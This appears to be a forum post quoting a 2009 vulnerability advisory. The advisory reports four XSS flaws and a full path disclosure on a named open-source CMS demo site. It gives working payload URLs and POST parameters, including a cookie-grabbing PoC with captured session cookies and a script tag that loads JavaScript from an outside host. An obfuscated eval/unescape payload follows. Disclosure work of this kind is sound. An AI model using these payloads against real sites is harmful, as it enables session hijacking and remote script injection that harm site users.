Quote

_ _ _ ____ _ _
/ \ _ __ _ __(_)_ ____ _| | / ___| ___ ___ _ _ _ __(_) |_ _ _
/ _ \ | '__| '__| \ \ / / _` | | \___ \ / _ \/ __| | | | '__| | __| | | |
/ ___ \| | | | | |\ V / (_| | | ___) | __/ (__| |_| | | | | |_| |_| |
/_/ \_\_| |_| |_| \_/ \__,_|_| |____/ \___|\___|\__,_|_| |_|\__|\__, |
|___/

+-----------------------------------------------------------------------------+
Author: Lix
Blog: https://arrivalsec.wordpress.com
Writer: http://0verl0ad.blogspot.com
Contact: Lix.security@gmail.com

Date of report: 17/6/2009
CMS: OpenSource CMS

+-----------------------------------------------------------------------------+

------++++=########################## Advisory & Vulnerabilites Information ##########################=++++------

Type: Web App Vuln
Details: 4 XSS & 1 FPD
Risk: Medium/High
Advisory ID: ASec-101
Discloure policy: RFpolicy

------++++=########################## ################################ ##########################=++++------

[+]XSS

1º [------XSS------]

Location: index.php
Method: GET
Url: http://php.opensourcecms.com/search/index.php?q=

PoC - Cookie Alert

http://php.opensourcecms.com/search/index.php?q="><script>alert(document.cookie);</script>

[Response]:

PHPSESSID=bf2c97c8e104e8724ec728249fb87cb6; OAID=ccb31a401923eb6600a415d1e3e329d2; OAVARS[55cb872]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.tmdhosting.com%2F%22%3B%7D; __utma=231256798.103564284.1245349628.1245349628.1245349628.1; __utmb=231256798.57.10.1245349628; __utmc=231256798; __utmz=231256798.1245349629.1.1.utmcsr=opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/

2º [------XSS------]

Location: registrer.php
Method: POST
Url: http://php.opensourcecms.com/register.php

PoC - Post Parameters (I use Tamper data for change the post parameters)

website="><script>alert(0);</script>
name ="><script>alert(1);</script>
email="><script>alert(2);</script>
..........

3º [------XSS------]

Location: contactus.php
Method: POST
Url: http://php.opensourcecms.com/general/contactus.php

PoC - Post Parameters (I use Tamper data for change the post parameters)

name="><script src="http://seth.oxyhost.com/descargas/js.js"></script>
email="> other evil code

4º [------XSS------]

Location: details.php
Method: POST
Url: http://php.opensourcecms.com/scripts/details.php?scriptid=[any id]&name=[name of script]

PoC - Post Parameters [in comments of the script] (I use Tamper data for change the post parameters)

name="><script>alert('XSS');</script>

[+]FPD

1º [------FPD------]

Location: show.php
Method: POST
Url: http://php.opensourcecms.com/scripts/show.php?catid=[x category]&cat=[name of category]

PoC - Post Parameters (I use Tamper data for change the post parameters)

sortby= some special char (';/;";\ etc...)

[Response]:

Notice: Undefined offset: 1 in /home/opencms/public_html/php/scripts/show.php on line 27

Fatal error: Call to a member function bind_param() on a non-object in /home/opencms/include/classes/Scripts.inc.php on line 262

Language: Javascript
javascript : /is/^{ a : ' weird ' }[' & wonderful ']/" language "
the_fun: ['never '] + stop['s']

Language: Javascript
a=0||eval||0;b=0||unescape||0;a(b(location))
a%3D0%7C%7Ceval%7C%7C0%3Bb%3D0%7C%7Cunescape%7C%7C0%3Ba%28b%28location%29%29#%0d%0aalert%28%22%75%6E%65%73%63%61%70%65%2B%72%6C%7A%21%22%29%3B

Global
Topics: 2,504, Posts: 7,114, Users: 974.
Our newest member Pablo Medina.

This forum
Topics: 44, Posts: 169.